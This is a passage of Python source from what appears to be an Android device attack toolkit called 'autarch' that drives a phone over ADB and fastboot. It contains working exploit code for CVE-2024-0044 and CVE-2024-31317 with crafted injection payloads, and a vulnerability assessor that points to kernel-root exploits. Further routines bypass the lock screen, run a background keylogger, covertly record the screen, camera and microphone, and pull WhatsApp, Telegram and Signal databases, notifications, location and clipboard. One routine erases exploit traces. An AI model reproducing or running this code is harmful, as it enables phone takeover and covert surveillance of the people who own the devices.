rcs_delete(self, serial, message_id): """Delete an RCS message from bugle_db by message _id. Requires ROOT.""" check = self.rcs_check_support(serial) if not check.get('database'): return {'success': False, 'error': 'Google Messages database not found (need root)'} db_remote = check['database'] pkg = check['messaging_app'] tmp = '/data/local/tmp/_bugle_db_del' out_dir = self._serial_dir('recon', serial) self._shell(serial, f'am force-stop {pkg}') time.sleep(0.5) self._shell(serial, f'su -c "cp {db_remote} {tmp} && chmod 666 {tmp}"') local_db = str(out_dir / 'bugle_db_del') result = self.hw.adb_pull(serial, tmp, local_db) if not result['success']: return {'success': False, 'error': 'Failed to pull database'} try: conn = sqlite3.connect(local_db) cur = conn.cursor() cur.execute('DELETE FROM parts WHERE message_id = ?', (message_id,)) cur.execute('DELETE FROM messages WHERE _id = ?', (message_id,)) deleted = cur.rowcount conn.commit() conn.close() except Exception as e: return {'success': False, 'error': f'Delete failed: {e}'} # Push back self.hw.adb_push(serial, local_db, tmp) self._shell(serial, f'su -c "cp {tmp} {db_remote} && chown $(stat -c %u:%g {db_remote}) {db_remote} 2>/dev/null"') self._shell(serial, f'rm {tmp} 2>/dev/null') self._shell(serial, f'monkey -p {pkg} -c android.intent.category.LAUNCHER 1 2>/dev/null') return {'success': deleted > 0, 'deleted_id': message_id, 'rows_affected': deleted} # ── Boot / Recovery ────────────────────────────────────────────── def get_bootloader_info(self, serial): """Get all fastboot variables.""" stdout, stderr, rc = self.hw._run_fastboot(['getvar', 'all'], serial=serial, timeout=15) output = stderr or stdout # fastboot outputs to stderr info = {} for line in output.split('\n'): line = line.strip() if ':' in line and not line.startswith('('): key, _, val = line.partition(':') key = key.strip() val = val.strip() if key and val: info[key] = val return info def backup_boot_image(self, serial): """Backup boot partition via dd. Requires ROOT in ADB mode.""" out_dir = self._serial_dir('boot', serial) # Find boot partition res = self._shell(serial, 'su -c "ls -la /dev/block/by-name/boot 2>/dev/null || ls -la /dev/block/bootdevice/by-name/boot 2>/dev/null"') boot_dev = None if res['returncode'] == 0: # Extract symlink target or device path output = res['output'].strip() parts = output.split() # Usually last element is the symlink target or the entry itself for p in reversed(parts): if p.startswith('/dev/'): boot_dev = p break if not boot_dev and '->' in output: boot_dev = output.split('->')[-1].strip() if not boot_dev: boot_dev = '/dev/block/by-name/boot' tmp = '/sdcard/boot_backup.img' res = self._shell(serial, f'su -c "dd if={boot_dev} of={tmp} bs=4096"', timeout=60) if res['returncode'] != 0: return {'success': False, 'error': res['output']} local_path = str(out_dir / f'boot_{int(time.time())}.img') result = self.hw.adb_pull(serial, tmp, local_path) self._shell(serial, f'rm {tmp}') if result['success'] and os.path.exists(local_path): size = os.path.getsize(local_path) return {'success': True, 'local_path': local_path, 'size': size} return {'success': False, 'error': 'Failed to pull boot image'} def flash_recovery(self, serial, img_path): """Flash custom recovery image via fastboot.""" if not os.path.isfile(img_path): return {'success': False, 'error': f'File not found: {img_path}'} return self.hw.fastboot_flash(serial, 'recovery', img_path) def flash_boot(self, serial, img_path): """Flash boot image via fastboot.""" if not os.path.isfile(img_path): return {'success': False, 'error': f'File not found: {img_path}'} return self.hw.fastboot_flash(serial, 'boot', img_path) def disable_verity(self, serial, vbmeta_path=None): """Disable dm-verity/AVB by flashing vbmeta with disable flags.""" if vbmeta_path and os.path.isfile(vbmeta_path): # Flash user-provided vbmeta return self.hw.fastboot_flash(serial, 'vbmeta', vbmeta_path) # Try fastboot command stdout, stderr, rc = self.hw._run_fastboot( ['--disable-verity', '--disable-verification', 'flash', 'vbmeta', 'vbmeta.img'], serial=serial, timeout=30 ) output = stderr or stdout if rc != 0: # Alternative: adb disable-verity res = self.hw._run_adb(['disable-verity'], serial=serial, timeout=15) return {'success': res[2] == 0, 'output': res[0] or res[1], 'method': 'adb'} return {'success': rc == 0, 'output': output, 'method': 'fastboot'} def boot_temp(self, serial, img_path): """Temporarily boot an image without flashing.""" if not os.path.isfile(img_path): return {'success': False, 'error': f'File not found: {img_path}'} stdout, stderr, rc = self.hw._run_fastboot( ['boot', img_path], serial=serial, timeout=60 ) output = stderr or stdout return {'success': rc == 0, 'output': output} def unlock_bootloader(self, serial): """Unlock bootloader. WIPES DATA.""" return self.hw.fastboot_oem_unlock(serial) # ── Root Methods ───────────────────────────────────────────────── def check_root(self, serial): """Check if device is rooted and by what method.""" result = {'rooted': False, 'method': None, 'version': None, 'details': {}} # Try su res = self._shell(serial, 'su -c id 2>/dev/null') if res['returncode'] == 0 and 'uid=0' in res['output']: result['rooted'] = True result['details']['su'] = True # Check for Magisk res = self._shell(serial, 'ls /data/adb/magisk/ 2>/dev/null') if res['returncode'] == 0 and res['output'].strip(): result['method'] = 'Magisk' result['details']['magisk_dir'] = True # Get version ver = self._shell(serial, 'su -c "magisk -c" 2>/dev/null') if ver['returncode'] == 0: result['version'] = ver['output'].strip() # Check Magisk app res = self._shell(serial, 'pm list packages | grep -i magisk 2>/dev/null') if res['returncode'] == 0 and res['output'].strip(): result['details']['magisk_app'] = res['output'].strip() if not result['method']: result['method'] = 'Magisk' # Check for SuperSU res = self._shell(serial, 'ls /system/xbin/su 2>/dev/null') if res['returncode'] == 0 and res['output'].strip(): if not result['method']: result['method'] = 'SuperSU' result['details']['supersu'] = True # Check build type res = self._shell(serial, 'getprop ro.build.type') build_type = res['output'].strip() if res['returncode'] == 0 else '' result['details']['build_type'] = build_type if build_type in ('userdebug', 'eng'): result['details']['debug_build'] = True return result def install_magisk(self, serial, apk_path): """Install Magisk APK on device.""" if not os.path.isfile(apk_path): return {'success': False, 'error': f'File not found: {apk_path}'} return self.hw.adb_install(serial, apk_path) def pull_patched_boot(self, serial): """Pull Magisk-patched boot image from /sdcard/Download/.""" out_dir = self._serial_dir('root', serial) # Find patched boot image res = self._shell(serial, 'ls -t /sdcard/Download/magisk_patched*.img 2>/dev/null') if res['returncode'] != 0 or not res['output'].strip(): return {'success': False, 'error': 'No magisk_patched*.img found in /sdcard/Download/'} remote = res['output'].strip().split('\n')[0].strip() local_path = str(out_dir / os.path.basename(remote)) result = self.hw.adb_pull(serial, remote, local_path) if result['success'] and os.path.exists(local_path): return {'success': True, 'local_path': local_path, 'size': os.path.getsize(local_path)} return {'success': False, 'error': 'Failed to pull patched boot image'} def root_via_exploit(self, serial, exploit_binary): """Deploy and execute a root exploit binary.""" if not os.path.isfile(exploit_binary): return {'success': False, 'error': f'File not found: {exploit_binary}'} # Deploy deploy = self.deploy_binary(serial, exploit_binary) if not deploy['success']: return deploy # Execute remote = deploy['remote_path'] res = self._shell(serial, remote, timeout=60) # Check if we got root root_check = self._shell(serial, 'su -c id 2>/dev/null') got_root = root_check['returncode'] == 0 and 'uid=0' in root_check['output'] return { 'success': got_root, 'exploit_output': res['output'], 'root_obtained': got_root, 'remote_path': remote, } def adb_root_shell(self, serial): """Attempt adb root for userdebug/eng builds.""" stdout, stderr, rc = self.hw._run_adb(['root'], serial=serial, timeout=10) output = stdout or stderr success = rc == 0 and 'cannot' not in output.lower() and 'not allowed' not in output.lower() return {'success': success, 'output': output} # ── Privilege Escalation Exploits ──────────────────────────────── def detect_os_type(self, serial) -> Dict[str, Any]: """Detect if device runs stock Android, GrapheneOS, or other custom ROM.""" info = {} fingerprint = self._shell(serial, 'getprop ro.build.fingerprint')['output'].strip() info['fingerprint'] = fingerprint info['is_grapheneos'] = 'grapheneos' in fingerprint.lower() # Additional GrapheneOS indicators if not info['is_grapheneos']: desc = self._shell(serial, 'getprop ro.build.description')['output'].strip() info['is_grapheneos'] = 'grapheneos' in desc.lower() brand = self._shell(serial, 'getprop ro.product.brand')['output'].strip() info['is_pixel'] = brand.lower() in ('google',) info['brand'] = brand info['model'] = self._shell(serial, 'getprop ro.product.model')['output'].strip() info['android_version'] = self._shell(serial, 'getprop ro.build.version.release')['output'].strip() info['sdk'] = self._shell(serial, 'getprop ro.build.version.sdk')['output'].strip() info['security_patch'] = self._shell(serial, 'getprop ro.build.version.security_patch')['output'].strip() info['build_type'] = self._shell(serial, 'getprop ro.build.type')['output'].strip() info['kernel'] = self._shell(serial, 'uname -r 2>/dev/null')['output'].strip() # Check for hardened_malloc (GrapheneOS indicator) malloc_check = self._shell(serial, 'getprop libc.debug.malloc.options 2>/dev/null') info['hardened_malloc'] = 'hardened' in malloc_check['output'].lower() if malloc_check['returncode'] == 0 else info['is_grapheneos'] # Check bootloader state bl = self._shell(serial, 'getprop ro.boot.verifiedbootstate')['output'].strip() info['verified_boot_state'] = bl # green=locked, orange=unlocked, yellow=custom key info['bootloader_unlocked'] = bl == 'orange' return info def assess_vulnerabilities(self, serial) -> Dict[str, Any]: """Assess which privilege escalation methods are available for this device.""" os_info = self.detect_os_type(serial) try: sdk_int = int(os_info.get('sdk', '0')) except ValueError: sdk_int = 0 patch = os_info.get('security_patch', '') is_graphene = os_info.get('is_grapheneos', False) is_pixel = os_info.get('is_pixel', False) vulns = [] # CVE-2024-0044: run-as privilege escalation (Android 12-13) if sdk_int in (31, 32, 33) and patch < '2024-10-01': vulns.append({ 'cve': 'CVE-2024-0044', 'name': 'run-as privilege escalation', 'severity': 'high', 'type': 'app_uid_access', 'description': 'Newline injection in PackageInstallerService allows run-as any app UID', 'requirements': 'ADB shell (UID 2000)', 'reliability': 'high', 'stealth': 'moderate', 'exploitable': True, }) # CVE-2024-31317: Zygote injection via WRITE_SECURE_SETTINGS (Android 12-14) if sdk_int in (31, 32, 33, 34) and patch < '2024-04-01': vulns.append({ 'cve': 'CVE-2024-31317', 'name': 'Zygote injection via settings', 'severity': 'high', 'type': 'app_uid_access', 'description': 'Inject commands into Zygote via hidden_api_blacklist_exemptions setting', 'requirements': 'ADB shell (UID 2000, has WRITE_SECURE_SETTINGS)', 'reliability': 'high', 'stealth': 'moderate', 'exploitable': not is_graphene, # GrapheneOS uses exec spawning, no Zygote 'note': 'BLOCKED on GrapheneOS (exec spawning model, no Zygote)' if is_graphene else '', }) # Pixel GPU exploit (CVE-2023-6241) — Pixel 7/8, Android 14 if is_pixel and sdk_int == 34 and patch < '2023-12-01': vulns.append({ 'cve': 'CVE-2023-6241', 'name': 'Pixel Mali GPU kernel root', 'severity': 'critical', 'type': 'kernel_root', 'description': 'Integer overflow in GPU ioctl → arbitrary kernel R/W → full root + SELinux disable', 'requirements': 'App context or ADB shell. Needs device-specific kernel offsets.', 'reliability': 'high (with correct offsets)', 'stealth': 'low', 'exploitable': True, 'public_poc': 'https://github.com/0x36/Pixel_GPU_Exploit', }) # CVE-2025-0072: Mali GPU MTE bypass (Pixel 7/8/9, pre-May 2025) if is_pixel and sdk_int >= 34 and patch < '2025-05-01': vulns.append({ 'cve': 'CVE-2025-0072', 'name': 'Mali GPU MTE bypass → kernel root', 'severity': 'critical', 'type': 'kernel_root', 'description': 'Page UAF in Mali CSF driver bypasses MTE via physical memory access', 'requirements': 'App context or ADB shell. Works even with kernel MTE (Pixel 8+).', 'reliability': 'high', 'stealth': 'low', 'exploitable': True, 'note': 'Bypasses GrapheneOS hardened_malloc and kernel MTE' if is_graphene else '', }) # fastboot temp root (unlocked bootloader) if os_info.get('bootloader_unlocked'): vulns.append({ 'cve': 'N/A', 'name': 'fastboot boot temp root', 'severity': 'info', 'type': 'temp_root', 'description': 'Boot Magisk-patched image via fastboot boot (no permanent modification)', 'requirements': 'Unlocked bootloader + physical access + fastboot', 'reliability': 'high', 'stealth': 'low (dm-verity tripped)', 'exploitable': True, }) elif not is_graphene: # Stock Pixel can be OEM unlocked vulns.append({ 'cve': 'N/A', 'name': 'OEM unlock + fastboot boot', 'severity': 'info', 'type': 'temp_root', 'description': 'Unlock bootloader (wipes device) then fastboot boot patched image', 'requirements': 'OEM unlock enabled in settings + physical access', 'reliability': 'high', 'stealth': 'none (full wipe)', 'exploitable': True, }) # GrapheneOS-specific: avbroot + custom AVB key if is_graphene and os_info.get('bootloader_unlocked'): vulns.append({ 'cve': 'N/A', 'name': 'avbroot + Magisk + relock', 'severity': 'info', 'type': 'persistent_root', 'description': 'Patch GrapheneOS OTA with avbroot + Magisk, flash custom AVB key, relock bootloader', 'requirements': 'Unlocked bootloader (one-time), avbroot tool, Magisk APK', 'reliability': 'high', 'stealth': 'moderate (Play Integrity may detect)', 'exploitable': True, 'tool': 'https://github.com/schnatterer/rooted-graphene', }) # Cellebrite USB chain (CVE-2024-53104) if patch < '2025-02-01': note = '' if is_graphene: note = 'GrapheneOS blocks USB data when screen locked — requires unlocked screen + active USB' vulns.append({ 'cve': 'CVE-2024-53104', 'name': 'USB UVC driver OOB write (Cellebrite chain)', 'severity': 'high', 'type': 'kernel_root', 'description': 'Malicious USB webcam descriptor triggers kernel heap write. Used by Cellebrite.', 'requirements': 'Physical access + custom USB device + screen unlocked (GrapheneOS)', 'reliability': 'high', 'stealth': 'moderate', 'exploitable': True, 'note': note, }) # ADB root (debug builds) if os_info.get('build_type') in ('userdebug', 'eng'): vulns.append({ 'cve': 'N/A', 'name': 'adb root (debug build)', 'severity': 'info', 'type': 'full_root', 'description': 'Device is userdebug/eng build — adb root gives UID 0', 'requirements': 'ADB connected', 'reliability': 'high', 'stealth': 'high', 'exploitable': True, }) # Shizuku / UID 2000 (always available with ADB) vulns.append({ 'cve': 'N/A', 'name': 'Shizuku / ADB shell (UID 2000)', 'severity': 'info', 'type': 'elevated_shell', 'description': 'ADB shell provides UID 2000 with access to dumpsys, pm, settings, content providers', 'requirements': 'ADB enabled + authorized', 'reliability': 'high', 'stealth': 'high', 'exploitable': True, 'note': 'Reduced capabilities on GrapheneOS (stricter SELinux)' if is_graphene else '', }) return { 'os_info': os_info, 'vulnerabilities': vulns, 'exploitable_count': sum(1 for v in vulns if v.get('exploitable')), 'has_kernel_root': any(v['type'] == 'kernel_root' for v in vulns if v.get('exploitable')), 'has_app_uid': any(v['type'] == 'app_uid_access' for v in vulns if v.get('exploitable')), } def exploit_cve_2024_0044(self, serial, target_package='com.google.android.apps.messaging') -> Dict[str, Any]: """Execute CVE-2024-0044 — run-as privilege escalation. Newline injection in PackageInstallerService.java createSessionInternal(). Forges a package entry allowing run-as with any app's UID. Works on Android 12-13 with security patch before October 2024. """ # Verify vulnerability sdk = self._shell(serial, 'getprop ro.build.version.sdk')['output'].strip() patch = self._shell(serial, 'getprop ro.build.version.security_patch')['output'].strip() try: sdk_int = int(sdk) except ValueError: return {'success': False, 'error': f'Cannot parse SDK version: {sdk}'} if sdk_int not in (31, 32, 33): return {'success': False, 'error': f'SDK {sdk_int} not vulnerable (need 31-33)'} if patch >= '2024-10-01': return {'success': False, 'error': f'Patch level {patch} is not vulnerable (need < 2024-10-01)'} # Step 1: Get target app UID uid_output = self._shell(serial, f'pm list packages -U | grep {target_package}')['output'] uid_match = re.search(r'uid:(\d+)', uid_output) if not uid_match: return {'success': False, 'error': f'Cannot find UID for {target_package}'} target_uid = uid_match.group(1) # Step 2: Find a small APK to use as carrier carrier_apk = '/data/local/tmp/autarch_carrier.apk' # Copy a small system APK for candidate in ['/system/app/BasicDreams/BasicDreams.apk', '/system/app/CaptivePortalLogin/CaptivePortalLogin.apk', '/system/priv-app/Settings/Settings.apk']: cp = self._shell(serial, f'cp {candidate} {carrier_apk} 2>/dev/null') if cp['returncode'] == 0: break else: return {'success': False, 'error': 'Cannot find carrier APK'} # Step 3: Craft injection payload victim_name = f'autarch_v_{int(time.time()) % 100000}' payload = ( f'@null\n' f'{victim_name} {target_uid} 1 /data/user/0 ' f'default:targetSdkVersion=28 none 0 0 1 @null' ) # Step 4: Install with injected installer name install = self._shell(serial, f'pm install -i "{payload}" {carrier_apk}', timeout=15) # Step 5: Verify access verify = self._shell(serial, f'run-as {victim_name} id') got_uid = f'uid={target_uid}' in verify['output'] or 'u0_a' in verify['output'] if got_uid: return { 'success': True, 'victim_name': victim_name, 'target_uid': target_uid, 'target_package': target_package, 'verify_output': verify['output'], 'message': f'CVE-2024-0044 exploit successful. Use: run-as {victim_name}', } return { 'success': False, 'error': 'Exploit did not achieve expected UID', 'install_output': install['output'], 'verify_output': verify['output'], } def exploit_cve_2024_31317(self, serial, target_package='com.google.android.apps.messaging') -> Dict[str, Any]: """Execute CVE-2024-31317 — Zygote injection via WRITE_SECURE_SETTINGS. Injects a newline + Zygote command into hidden_api_blacklist_exemptions. On next app spawn, Zygote executes injected code as the target app UID. Works on Android 12-14 pre-March 2024 patch. BLOCKED on GrapheneOS (exec spawning). """ # Check if device uses Zygote (not GrapheneOS exec spawning) os_info = self.detect_os_type(serial) if os_info.get('is_grapheneos'): return {'success': False, 'error': 'GrapheneOS uses exec spawning — no Zygote to inject into'} sdk = os_info.get('sdk', '0') patch = os_info.get('security_patch', '') try: sdk_int = int(sdk) except ValueError: return {'success': False, 'error': f'Cannot parse SDK version: {sdk}'} if sdk_int not in (31, 32, 33, 34): return {'success': False, 'error': f'SDK {sdk_int} not vulnerable'} if patch >= '2024-04-01': return {'success': False, 'error': f'Patch {patch} not vulnerable'} # Get target UID uid_output = self._shell(serial, f'pm list packages -U | grep {target_package}')['output'] uid_match = re.search(r'uid:(\d+)', uid_output) if not uid_match: return {'success': False, 'error': f'Cannot find UID for {target_package}'} # Inject into hidden_api_blacklist_exemptions # The injected command tells Zygote to run a shell command on next app fork staging = '/data/local/tmp/autarch_31317' inject_cmd = f'mkdir -p {staging} && id > {staging}/whoami' zygote_payload = f'*\\n--invoke-with\\n/system/bin/sh -c {inject_cmd}' result = self._shell(serial, f'settings put global hidden_api_blacklist_exemptions "{zygote_payload}"') # Force target app restart to trigger Zygote fork self._shell(serial, f'am force-stop {target_package}') time.sleep(1) # Launch target to trigger the fork self._shell(serial, f'monkey -p {target_package} -c android.intent.category.LAUNCHER 1 2>/dev/null') time.sleep(3) # Check if injection worked check = self._shell(serial, f'cat {staging}/whoami 2>/dev/null') # IMPORTANT: Clean up the setting self._shell(serial, 'settings put global hidden_api_blacklist_exemptions "*"') if check['returncode'] == 0 and check['output'].strip(): return { 'success': True, 'injected_uid': check['output'].strip(), 'target_package': target_package, 'message': f'CVE-2024-31317 injection successful. Executed as: {check["output"].strip()}', } return { 'success': False, 'error': 'Zygote injection did not produce output — app may not have spawned', 'settings_result': result['output'], } def fastboot_temp_root(self, serial, patched_image_path: str) -> Dict[str, Any]: """Boot a Magisk-patched boot/init_boot image via fastboot (non-persistent root). Requires: unlocked bootloader, device in fastboot mode, patched image file. Does NOT flash — just boots temporarily. Reboot returns to stock. """ if not os.path.isfile(patched_image_path): return {'success': False, 'error': f'File not found: {patched_image_path}'} # Check if we're in fastboot mode stdout, stderr, rc = self.hw._run_fastboot(['devices'], serial=serial, timeout=10) if serial not in (stdout or ''): return { 'success': False, 'error': 'Device not in fastboot mode. Run: adb reboot bootloader', } # Boot the patched image (NOT flash) stdout, stderr, rc = self.hw._run_fastboot( ['boot', patched_image_path], serial=serial, timeout=60 ) output = stdout or stderr success = rc == 0 and 'FAILED' not in output.upper() return { 'success': success, 'output': output, 'message': 'Temporary root boot initiated — device should boot with Magisk root. ' 'Root is lost on next reboot.' if success else 'fastboot boot failed', 'note': 'BLOCKED on locked GrapheneOS bootloader' if not success else '', } def cleanup_cve_2024_0044(self, serial, victim_name: str) -> Dict[str, Any]: """Remove traces of CVE-2024-0044 exploit.""" results = [] # Uninstall forged package out = self._shell(serial, f'pm uninstall {victim_name}') results.append(f'Uninstall {victim_name}: {out["output"]}') # Remove carrier APK self._shell(serial, 'rm -f /data/local/tmp/autarch_carrier.apk') results.append('Removed carrier APK') return {'success': True, 'cleanup': results} # ── Screen & Input Control (Android 9+) ────────────────────────── def screen_capture(self, serial): """Take a screenshot and pull it.""" out_dir = self._serial_dir('recon', serial) remote = '/sdcard/autarch_screen.png' self._shell(serial, f'screencap -p {remote}') local = str(out_dir / f'screen_{int(time.time())}.png') result = self.hw.adb_pull(serial, remote, local) self._shell(serial, f'rm {remote}') if result['success'] and os.path.exists(local): return {'success': True, 'path': local, 'size': os.path.getsize(local)} return {'success': False, 'error': 'Screenshot failed'} def screen_record(self, serial, duration=10, size='1280x720'): """Record screen video and pull it. Max 180s.""" duration = min(int(duration), 180) out_dir = self._serial_dir('recon', serial) remote = '/sdcard/autarch_record.mp4' self._shell(serial, f'screenrecord --time-limit {duration} --size {size} {remote}', timeout=duration + 10) local = str(out_dir / f'record_{int(time.time())}.mp4') result = self.hw.adb_pull(serial, remote, local) self._shell(serial, f'rm {remote}') if result['success'] and os.path.exists(local): return {'success': True, 'path': local, 'size': os.path.getsize(local), 'duration': duration} return {'success': False, 'error': 'Screen recording failed'} def input_tap(self, serial, x, y): """Tap at screen coordinates.""" res = self._shell(serial, f'input tap {x} {y}') return {'success': res['returncode'] == 0, 'x': x, 'y': y} def input_swipe(self, serial, x1, y1, x2, y2, duration_ms=300): """Swipe from (x1,y1) to (x2,y2).""" res = self._shell(serial, f'input swipe {x1} {y1} {x2} {y2} {duration_ms}') return {'success': res['returncode'] == 0} def input_text(self, serial, text): """Type text on device. Spaces become %s.""" escaped = text.replace(' ', '%s').replace('&', '\\&').replace(';', '\\;') res = self._shell(serial, f'input text "{escaped}"') return {'success': res['returncode'] == 0, 'text': text} def input_keyevent(self, serial, keycode): """Send keyevent. Common: 3=HOME, 4=BACK, 26=POWER, 82=MENU, 187=RECENTS.""" res = self._shell(serial, f'input keyevent {keycode}') return {'success': res['returncode'] == 0, 'keycode': keycode} def start_keylogger(self, serial): """Start getevent-based keylogger in background. Returns PID.""" remote_log = '/data/local/tmp/keylog.txt' cmd = f'nohup sh -c "getevent -lt > {remote_log} 2>&1" &' res = self._shell(serial, cmd) # Get PID pid_res = self._shell(serial, 'pgrep -f "getevent -lt"') pid = pid_res['output'].strip().split('\n')[0].strip() if pid_res['returncode'] == 0 else '' return {'success': True, 'pid': pid, 'log_path': remote_log} def stop_keylogger(self, serial): """Stop keylogger and pull log file.""" self._shell(serial, 'pkill -f "getevent -lt"') out_dir = self._serial_dir('recon', serial) local = str(out_dir / f'keylog_{int(time.time())}.txt') result = self.hw.adb_pull(serial, '/data/local/tmp/keylog.txt', local) self._shell(serial, 'rm /data/local/tmp/keylog.txt') if result['success'] and os.path.exists(local): return {'success': True, 'path': local, 'size': os.path.getsize(local)} return {'success': False, 'error': 'No keylog found'} def camera_capture(self, serial, camera='back'): """Take photo using device camera via intent.""" out_path = '/sdcard/DCIM/autarch_capture.jpg' # Use am to start camera and capture if camera == 'front': extra = '--ei android.intent.extras.CAMERA_FACING 1' else: extra = '' self._shell(serial, f'am start -a android.media.action.IMAGE_CAPTURE {extra}') time.sleep(2) # Simulate shutter press via keyevent (CAMERA=27, or DPAD_CENTER=23) self._shell(serial, 'input keyevent 27 2>/dev/null; input keyevent 23 2>/dev/null') time.sleep(2) # Press back to confirm self._shell(serial, 'input keyevent 4') time.sleep(1) # Find latest photo res = self._shell(serial, 'ls -t /sdcard/DCIM/Camera/*.jpg 2>/dev/null') if res['returncode'] == 0 and res['output'].strip(): latest = res['output'].strip().split('\n')[0].strip() out_dir = self._serial_dir('recon', serial) local = str(out_dir / f'camera_{int(time.time())}.jpg') result = self.hw.adb_pull(serial, latest, local) if result['success']: return {'success': True, 'path': local, 'size': os.path.getsize(local)} return {'success': False, 'error': 'Camera capture may have failed - check device'} def audio_record(self, serial, duration=10): """Record audio from microphone. Needs Android 10+ or root for silent.""" duration = min(int(duration), 120) remote = '/sdcard/autarch_audio.3gp' # Start recording in background, then kill after duration cmd = (f'nohup sh -c "' f'am start -n com.android.soundrecorder/.SoundRecorder 2>/dev/null; ' f'sleep 1; input keyevent 85; sleep {duration}; input keyevent 86; ' f'sleep 1; input keyevent 4' f'" > /dev/null 2>&1 &') res = self._shell(serial, cmd, timeout=5) return { 'success': True, 'duration': duration, 'note': f'Recording for {duration}s via SoundRecorder intent. Pull audio manually after.', } def dismiss_lockscreen(self, serial): """Attempt to dismiss lock screen / wake device.""" results = [] # Wake screen self._shell(serial, 'input keyevent 26') # POWER time.sleep(0.5) self._shell(serial, 'input keyevent 82') # MENU (unlocks swipe-only) time.sleep(0.3) # Swipe up to dismiss self._shell(serial, 'input swipe 540 1800 540 400 300') time.sleep(0.3) # Check if lock screen is still showing res = self._shell(serial, 'dumpsys window | grep mDreamingLockscreen') locked = 'true' in res['output'].lower() if res['returncode'] == 0 else False return {'success': not locked, 'locked': locked} def disable_lockscreen(self, serial): """Disable lock screen via settings (debug builds or root).""" cmds = [ 'settings put secure lockscreen.disabled 1', 'locksettings clear --old ""', 'locksettings set-disabled true', ] results = [] for c in cmds: r = self._shell(serial, c) results.append({'cmd': c, 'rc': r['returncode'], 'out': r['output'].strip()}) return {'success': True, 'results': results} # ── Extended Data Exfiltration ─────────────────────────────────── def extract_clipboard(self, serial): """Get current clipboard content.""" res = self._shell(serial, 'service call clipboard 2 i32 1 i32 0 2>/dev/null') # Parse parcel result text = '' if res['returncode'] == 0: # Try to extract string from service call output parts = res['output'].split("'") if len(parts) >= 2: text = parts[1].replace('\n', '') if not text: # Fallback: try am broadcast method res = self._shell(serial, 'am broadcast -a clipper.get 2>/dev/null') text = res['output'].strip() return {'success': True, 'clipboard': text} def dump_notifications(self, serial): """Dump current notifications.""" res = self._shell(serial, 'dumpsys notification --noredact 2>/dev/null', timeout=15) if res['returncode'] != 0: return {'success': False, 'error': res['output']} # Parse notifications notifications = [] current = {} for line in res['output'].split('\n'): line = line.strip() if line.startswith('NotificationRecord'): if current: notifications.append(current) current = {'raw': line} elif 'pkg=' in line and current: m = re.search(r'pkg=(\S+)', line) if m: current['package'] = m.group(1) elif 'android.title=' in line and current: current['title'] = line.split('=', 1)[1].strip() elif 'android.text=' in line and current: current['text'] = line.split('=', 1)[1].strip() if current: notifications.append(current) return {'success': True, 'notifications': notifications, 'count': len(notifications)} def extract_location(self, serial): """Get device location data.""" info = {} # GPS from dumpsys res = self._shell(serial, 'dumpsys location 2>/dev/null', timeout=15) if res['returncode'] == 0: for line in res['output'].split('\n'): line = line.strip() if 'Last Known Location' in line or 'last location=' in line.lower(): info['last_location'] = line elif 'fused' in line.lower() and ('lat' in line.lower() or 'location' in line.lower()): info['fused'] = line # Settings res = self._shell(serial, 'settings get secure location_mode') info['location_mode'] = res['output'].strip() res = self._shell(serial, 'settings get secure location_providers_allowed') info['providers'] = res['output'].strip() return {'success': True, **info} def extract_media_list(self, serial, media_type='photos'): """List media files on device.""" paths = { 'photos': '/sdcard/DCIM/Camera/', 'downloads': '/sdcard/Download/', 'screenshots': '/sdcard/Pictures/Screenshots/', 'whatsapp_media': '/sdcard/WhatsApp/Media/', 'telegram_media': '/sdcard/Telegram/', } path = paths.get(media_type, f'/sdcard/{media_type}/') res = self._shell(serial, f'ls -lhS {path} 2>/dev/null', timeout=10) files = [] if res['returncode'] == 0: for line in res['output'].split('\n'): line = line.strip() if line and not line.startswith('total'): files.append(line) return {'success': True, 'path': path, 'files': files, 'count': len(files)} def pull_media_folder(self, serial, media_type='photos', limit=50): """Pull media files from device.""" paths = { 'photos': '/sdcard/DCIM/Camera/', 'downloads': '/sdcard/Download/', 'screenshots': '/sdcard/Pictures/Screenshots/', } remote_path = paths.get(media_type, f'/sdcard/{media_type}/') out_dir = self._serial_dir('recon', serial) / media_type out_dir.mkdir(parents=True, exist_ok=True) # List files res = self._shell(serial, f'ls -1t {remote_path} 2>/dev/null') if res['returncode'] != 0: return {'success': False, 'error': f'Cannot list {remote_path}'} pulled = [] for fname in res['output'].strip().split('\n')[:limit]: fname = fname.strip() if not fname: continue remote = f'{remote_path}{fname}' local = str(out_dir / fname) r = self.hw.adb_pull(serial, remote, local) if r['success']: pulled.append(local) return {'success': len(pulled) > 0, 'pulled': pulled, 'count': len(pulled), 'output_dir': str(out_dir)} def extract_whatsapp_db(self, serial): """Extract WhatsApp message database. Requires ROOT.""" out_dir = self._serial_dir('recon', serial) db_paths = [ '/data/data/com.whatsapp/databases/msgstore.db', '/data/data/com.whatsapp/databases/wa.db', ] pulled = [] for db in db_paths: tmp = f'/data/local/tmp/_wa_{os.path.basename(db)}' self._shell(serial, f'su -c "cp {db} {tmp} && chmod 644 {tmp}"') local = str(out_dir / f'whatsapp_{os.path.basename(db)}') r = self.hw.adb_pull(serial, tmp, local) self._shell(serial, f'rm {tmp}') if r['success'] and os.path.exists(local): pulled.append(local) if not pulled: # Try unencrypted backup backup = '/sdcard/WhatsApp/Databases/msgstore.db.crypt14' r = self.hw.adb_pull(serial, backup, str(out_dir / 'msgstore.db.crypt14')) if r['success']: pulled.append(str(out_dir / 'msgstore.db.crypt14')) return {'success': len(pulled) > 0, 'files': pulled, 'note': 'Root extracts decrypted DB. Non-root gets encrypted backup.'} def extract_telegram_db(self, serial): """Extract Telegram database. Requires ROOT.""" out_dir = self._serial_dir('recon', serial) db = '/data/data/org.telegram.messenger/files/cache4.db' tmp = '/data/local/tmp/_tg_cache4.db' self._shell(serial, f'su -c "cp {db} {tmp} && chmod 644 {tmp}"') local = str(out_dir / 'telegram_cache4.db') r = self.hw.adb_pull(serial, tmp, local) self._shell(serial, f'rm {tmp}') if r['success'] and os.path.exists(local): return {'success': True, 'path': local, 'size': os.path.getsize(local)} return {'success': False, 'error': 'Cannot extract Telegram DB (need root)'} def extract_signal_db(self, serial): """Extract Signal database. Requires ROOT.""" out_dir = self._serial_dir('recon', serial) db = '/data/data/org.thoughtcrime.securesms/databases/signal.db' tmp = '/data/local/tmp/_signal.db' self._shell(serial, f'su -c "cp {db} {tmp} && chmod 644 {tmp}"') local = str(out_dir / 'signal.db') r = self.hw.adb_pull(serial, tmp, local) self._shell(serial, f'rm {tmp}') if r['success'] and os.path.exists(local): return {'success': True, 'path': local, 'size': os.path.getsize(local)} return {'success': False, 'error': 'Cannot extract Signal DB (need root)'} def dump_all_settings(self, serial): """Dump all Android settings (system, secure, global).""" settings = {} for ns in ('system', 'secure', 'global'): res = 